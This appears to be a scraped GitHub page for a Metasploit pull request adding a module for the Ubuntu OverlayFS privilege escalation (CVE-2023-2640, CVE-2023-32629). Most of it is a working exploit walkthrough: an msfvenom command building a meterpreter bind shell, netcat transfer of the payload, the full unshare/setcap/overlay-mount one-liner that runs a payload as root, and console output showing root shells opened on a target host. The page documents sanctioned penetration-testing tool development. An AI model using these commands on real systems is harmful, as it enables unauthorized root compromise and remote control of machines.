metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privillege Escalation

Open gardnerapp opened this issue 5 months ago • 6 comments

This module was originally suggested by #18765 and builds on this PoC from @g1vi. CVE-2023-2640 and CVE-2023-32629 allow for privilege escalation on Ubuntu systems due to a failure to call vfs_setxattr during execution of ovl_do_setxattr, this results in the failure to sanitize file capabilities during file system union process. This article explains the technical details of the vulnerability much better then I can and also provides a convenient list of vulnerable Ubuntu and Kernel versions.

This exploit was tested on Ubuntu Focal Fossa 20.04.6 with a 5.4.0-1018-aws kernel. I changed the Kernel version by following this tutorial , the google drive doc linked in the video is probably quicker to read. Please note that I used a bind shell to connect to the system, and a bind shell as a payload for the exploit. I am well aware that bind shells are frowned upon IRL because of firewalls, IDS, etc. I only had to use one because I don't have access to a Linux System outside of the cloud.

Verification

1, Target System

ubuntu@ubuntu ~$ cat /etc/os-release && uname -a
NAME="Ubuntu"VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

  1. Creating a bind shell msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=5555 -f elf -o bind.elf

  2. Transfer the bind shell I used netcat On remote machine: nc -lvnp 1234 > bind.elf Local machine cat bind.elf > <REMOTE IPADDRESS> 1234

  3. Execute the bind shell chmod +x bind.elf && ./bind.elf

  4. Start msf and connect to bind shell

$ msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meteroreter/bind_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:5555
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 1 opened (172.16.227.214:52193 -> 54.158.170.60:5555) at 2024-09-13 09:48:31 -0400

meterpreter > shell
Process 9129 created.
Channel 1 created.
whoami
ubuntu
exit
meterpreter > bg
[*] Backgrounding session 1...
  1. Running the exploit, I unfortunately also had to use a bind shell for this.
msf6 exploit(multi/handler) > use exploit/linux/local/game_overlay_privesc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set session 1 
session => 1
msf6 exploit(linux/local/game_overlay_privesc) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set lport 6666
lport => 6666
msf6 exploit(linux/local/game_overlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory /tmp/main/l
[*] Creating directory /tmp/main/u
[*] Creating directory /tmp/main/w
[*] Creating directory /tmp/main/m
[*] Creating directory to store payload: /tmp/main/
[*] Writing payload: /tmp/main/marv
[*] Starting new namespace, and running exploit...
[*] Running exploit: 'unshare -rm sh -c "cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system("chmod +x /tmp/main/marv && /tmp/main/marv")' ' 

false
[*] Command Stager progress - 100.00% done (747/747 bytes)
[*] Started bind TCP handler against :6666
[*] Exploit completed, but no session was created.

There is now a bind shell running on the system with root level privileges. On the remote system you can verify the listening port with ss -ano | grep 6666

  1. Connect to the root bind shell
msf6 exploit(linux/local/game_overlay_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:6666
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 2 opened (172.16.227.214:52242 -> 54.158.170.60:6666) at 2024-09-13 09:53:31 -0400

meterpreter > shell
Process 9532 created.
Channel 1 created.
whoami
root

Here are some Pictures

Open bind port on target: bind_shell

Process list after payload execution marv is meterpreter running as root processes

Exploit Screenshot 2024-09-13 at 9 54 15 AM

Screenshot 2024-09-13 at 9 53 49 AM

gardnerapp avatar Sep 13 '24 14:09 gardnerapp